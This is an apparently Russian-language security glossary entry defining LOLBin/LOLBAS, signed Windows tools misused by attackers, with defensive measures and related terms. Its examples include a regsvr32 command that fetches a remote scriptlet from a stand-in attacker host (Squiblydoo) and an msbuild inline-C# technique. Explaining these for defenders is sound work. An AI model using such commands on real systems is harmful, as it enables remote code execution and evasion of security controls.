LOLBin / LOLBAS
Что такое LOLBin / LOLBAS?
LOLBin / LOLBASПодписанный системный бинарь или скрипт (LOLBin/LOLBAS), который атакующие используют для исполнения, загрузки, закрепления или обхода защит, выглядя при этом как штатный администраторский инструмент.
LOLBin (Living-Off-the-Land Binary) и более широкий проект LOLBAS (Living-Off-the-Land Binaries And Scripts) каталогизируют подписанные Microsoft бинарные файлы, скрипты и библиотеки, побочные эффекты которых полезны для наступательных операций: исполнение произвольного кода, загрузка удалённой полезной нагрузки, обход контроля приложений. Типичные примеры — rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe и certutil.exe. Поскольку каждый такой инструмент подписан и доверен, защитники не могут просто блокировать по хешу — нужно различать ожидаемые и аномальные командные строки. LOLBAS лежит в основе многих техник execution и defense evasion из MITRE ATT&CK. Защита опирается на allow-list приложений, журналирование ScriptBlock и создания процессов, правила ASR и поведенческую аналитику EDR.
● Примеры
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml для запуска инлайнового C# без записи EXE на диск.
● Частые вопросы
Что такое LOLBin / LOLBAS?
Подписанный системный бинарь или скрипт (LOLBin/LOLBAS), который атакующие используют для исполнения, загрузки, закрепления или обхода защит, выглядя при этом как штатный администраторский инструмент. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает LOLBin / LOLBAS?
Подписанный системный бинарь или скрипт (LOLBin/LOLBAS), который атакующие используют для исполнения, загрузки, закрепления или обхода защит, выглядя при этом как штатный администраторский инструмент.
Как работает LOLBin / LOLBAS?
LOLBin (Living-Off-the-Land Binary) и более широкий проект LOLBAS (Living-Off-the-Land Binaries And Scripts) каталогизируют подписанные Microsoft бинарные файлы, скрипты и библиотеки, побочные эффекты которых полезны для наступательных операций: исполнение произвольного кода, загрузка удалённой полезной нагрузки, обход контроля приложений. Типичные примеры — rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe и certutil.exe. Поскольку каждый такой инструмент подписан и доверен, защитники не могут просто блокировать по хешу — нужно различать ожидаемые и аномальные командные строки. LOLBAS лежит в основе многих техник execution и defense evasion из MITRE ATT&CK. Защита опирается на allow-list приложений, журналирование ScriptBlock и создания процессов, правила ASR и поведенческую аналитику EDR.
Как защититься от LOLBin / LOLBAS?
Защита от LOLBin / LOLBAS обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия LOLBin / LOLBAS?
Распространённые альтернативные названия: LOLBAS, Living-off-the-Land Binary.
● Связанные термины
- attacks№ 616
Living off the Land
Стиль атаки, при котором противник вместо собственного вредоносного ПО злоупотребляет легитимными встроенными инструментами и скриптами на скомпрометированной системе.
- malware№ 417
Бесфайловое вредоносное ПО
Малварь, выполняющаяся преимущественно в памяти и использующая доверенные системные инструменты, без размещения традиционных исполняемых файлов на диске.
- defense-ops№ 298
Обход защит (Defense Evasion)
Тактика MITRE ATT&CK (TA0005), охватывающая техники, которыми атакующий уклоняется от обнаружения, отключает средства защиты и скрывает свою активность.
- defense-ops№ 371
EDR (обнаружение и реагирование на конечных точках)
Технология защиты конечных точек, которая непрерывно фиксирует активность процессов, файлов, реестра и сети, чтобы обнаруживать, расследовать и устранять угрозы на хостах.
- defense-ops№ 682
Mimikatz
Открытый инструмент пост-эксплуатации Windows, извлекающий пароли в открытом виде, хеши, тикеты Kerberos и другие учётные данные из памяти и LSASS.
- attacks№ 045
Обход AMSI
Техники, отключающие, патчащие или обходящие Windows Antimalware Scan Interface, чтобы скрипты и in-memory полезные нагрузки не попадали под проверку антивирусов.